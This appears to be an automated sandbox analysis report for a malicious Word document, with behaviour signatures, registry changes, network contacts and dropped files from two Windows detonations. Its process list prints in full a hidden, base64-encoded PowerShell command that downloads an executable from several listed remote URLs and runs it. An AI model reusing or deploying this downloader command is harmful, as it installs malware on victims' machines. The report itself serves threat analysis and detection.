Analysis Overview
SHA256
71dc7b3ec20fe14ce87e29bb46815dd2ba908ca055dd70b5ae9c89cb7cd3030a
Threat Level: Known bad
The file 71dc7b3ec20fe14ce87e29bb46815dd2ba908ca055dd70b5ae9c89cb7cd3030a was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Suspicious Office macro
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Drops file in System32 directory
Drops file in Windows directory
System Location Discovery: System Language Discovery
Office loads VBA resources, possible macro or embedded object present
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Suspicious behavior: AddClipboardFormatListener
Checks processor information in registry
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-13 21:12
Signatures
Suspicious Office macro
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-13 21:12
Reported
2024-11-13 21:13
Platform
win7-20240903-en
Max time kernel
53s
Max time network
17s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Office loads VBA resources, possible macro or embedded object present
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B67B92D0-9D87-45DB-A272-0741E32242A9} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B67B92D0-9D87-45DB-A272-0741E32242A9}\2.0\FLAGS\ = "6" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\TypeLib | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\TypeLib\{B67B92D0-9D87-45DB-A272-0741E32242A9}\2.0\FLAGS\ = "6" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B67B92D0-9D87-45DB-A272-0741E32242A9}\2.0\0 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\TypeLib\{B67B92D0-9D87-45DB-A272-0741E32242A9}\2.0\0 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\TypeLib\{B67B92D0-9D87-45DB-A272-0741E32242A9}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B67B92D0-9D87-45DB-A272-0741E32242A9}\2.0\HELPDIR | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\TypeLib\{B67B92D0-9D87-45DB-A272-0741E32242A9} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\TypeLib\{B67B92D0-9D87-45DB-A272-0741E32242A9}\2.0\0\win32 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2188 wrote to memory of 2956 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\splwow64.exe |
| PID 2188 wrote to memory of 2956 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\splwow64.exe |
| PID 2188 wrote to memory of 2956 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\splwow64.exe |
| PID 2188 wrote to memory of 2956 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | C:\Windows\splwow64.exe |
Processes
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\71dc7b3ec20fe14ce87e29bb46815dd2ba908ca055dd70b5ae9c89cb7cd3030a.doc"
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell -w hidden -en JABHAGsAYgBlAGkAbgBoAG4AZAB4AD0AJwBKAHMAawB0AHoAYgBxAGgAdgBpAHIAaQAnADsAJABHAHIAegBoAHAAaQBsAGMAeQAgAD0AIAAnADUAMAA2ACcAOwAkAFYAZQBnAGsAcAB2AGgAbABjAGUAbwBiAD0AJwBIAHcAaAB5AHcAcQBvAGYAcABtACcAOwAkAE4AbgBkAHMAcgBuAGcAcwBrAHAAdAB1AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABHAHIAegBoAHAAaQBsAGMAeQArACcALgBlAHgAZQAnADsAJABCAHAAeQBzAHMAcgB4AHQAbAA9ACcATQBzAHoAYwBoAGgAbwBsAHoAbwB2AG8AbAAnADsAJABFAG8AZgBpAGMAbwBnAHEAaQA9ACYAKAAnAG4AZQB3AC0AbwBiAGoAZQAnACsAJwBjACcAKwAnAHQAJwApACAAbgBFAFQALgB3AEUAQgBDAEwAaQBFAG4AVAA7ACQAUwBhAHcAawB2AHkAYwBrAHgAegBzAD0AJwBoAHQAdABwADoALwAvAHQAcgBlAG4AZABpAG4AZgBvAHIAbQBhAHQAaQBjAGEALgBlAHUALwBhAHIAYwBmAGEAYgByAGkAYwBzAC8AaQA4ADgAaQB4AHkAOQAvACoAaAB0AHQAcAA6AC8ALwB0AGgAZQBvAG0AZQBsAGUAdAAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGYAUQBkAC8AKgBoAHQAdABwADoALwAvAGsAZwBkADgAOQA4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBoADQANQBtAGkALwAqAGgAdAB0AHAAOgAvAC8AaQBkAGUAYQBsAHMAcwBzAGMAaABhAG4AZwAuAGMAbwBtAC8AYwBhAGwAZQBuAGQAYQByAC8ANgAwAFAAYwBCAC8AKgBoAHQAdABwADoALwAvAGgAYQBwAHAAaQBuAGUAcwBzADMANgAwAGQAZQBnAHIAZQBlAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBmAGoALwAnAC4AIgBzAHAATABgAEkAVAAiACgAJwAqACcAKQA7ACQAUQB2AGYAcABwAHUAagBoAHQAcgA9ACcATAB4AGUAagBhAHgAegB1AGcAdwAnADsAZgBvAHIAZQBhAGMAaAAoACQAQQBxAGkAdwBvAGUAbABiAGwAIABpAG4AIAAkAFMAYQB3AGsAdgB5AGMAawB4AHoAcwApAHsAdAByAHkAewAkAEUAbwBmAGkAYwBvAGcAcQBpAC4AIgBEAGAAbwBgAHcAbgBMAE8AQQBEAEYASQBgAEwAZQAiACgAJABBAHEAaQB3AG8AZQBsAGIAbAAsACAAJABOAG4AZABzAHIAbgBnAHMAawBwAHQAdQApADsAJABZAGEAYQBiAHQAZwBhAG0AaQA9ACcAQwBuAHYAdQBjAGMAawBnACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQATgBuAGQAcwByAG4AZwBzAGsAcAB0AHUAKQAuACIATABgAGUATgBHAFQASAAiACAALQBnAGUAIAAyADgANQAzADQAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBgAFQAYQByAHQAIgAoACQATgBuAGQAcwByAG4AZwBzAGsAcAB0AHUAKQA7ACQAQwBvAHYAZgB1AHEAbQBwAGMAdQBoAHgAcgA9ACcASQBvAG4AcQBhAGIAYwB3AGIAdgBlAGQAJwA7AGIAcgBlAGEAawA7ACQAVwBwAGMAbgBiAHkAbQBmAG8AbABrAGEAPQAnAEYAdQBxAGUAZgBpAHUAdgB0ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFcAegByAHQAagBxAG0AcAB4AGcAZQBmAD0AJwBRAGgAYwBhAGIAZwBhAGgAdwBxAGgAJwA=
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | trendinformatica.eu | udp |
| DE | 78.46.177.194:80 | trendinformatica.eu | tcp |
| US | 8.8.8.8:53 | theomelet.com | udp |
| US | 66.115.171.70:80 | theomelet.com | tcp |
| US | 8.8.8.8:53 | kgd898.com | udp |
| US | 8.8.8.8:53 | idealssschang.com | udp |
| US | 8.8.8.8:53 | happiness360degree.com | udp |
Files
memory/2188-0-0x000000002FA91000-0x000000002FA92000-memory.dmp
memory/2188-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2188-2-0x0000000070CFD000-0x0000000070D08000-memory.dmp
memory/2188-5-0x0000000005F00000-0x0000000006000000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\27FEBE26.wmf
| MD5 | 7a9aa8e96cb827287c7b9f28ca898e30 |
| SHA1 | 713c96fbb031a6e8aeeb5a66e04a6f3b09f0710e |
| SHA256 | 171517ffcc80fdfc3669b5551888a942174f05009ccda70c5ff406d5f07150c1 |
| SHA512 | f743b11deddec995801e371e645c143f657d13773e0ca2cabbe3e5371dd5bd35061a82a89e0fcf76523081a13c139e3a70e0e1a46bdcfaaa8d37d7901f26e37d |
memory/2188-14-0x00000000049C0000-0x0000000004AC0000-memory.dmp
memory/2188-21-0x00000000049C0000-0x0000000004AC0000-memory.dmp
memory/2188-24-0x00000000049C0000-0x0000000004AC0000-memory.dmp
memory/2568-30-0x000000001B720000-0x000000001BA02000-memory.dmp
memory/2568-31-0x0000000001FD0000-0x0000000001FD8000-memory.dmp
memory/2188-38-0x0000000070CFD000-0x0000000070D08000-memory.dmp
memory/2188-39-0x00000000049C0000-0x0000000004AC0000-memory.dmp
memory/2188-40-0x00000000049C0000-0x0000000004AC0000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-13 21:12
Reported
2024-11-13 21:13
Platform
win10v2004-20241007-en
Max time kernel
46s
Max time network
41s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
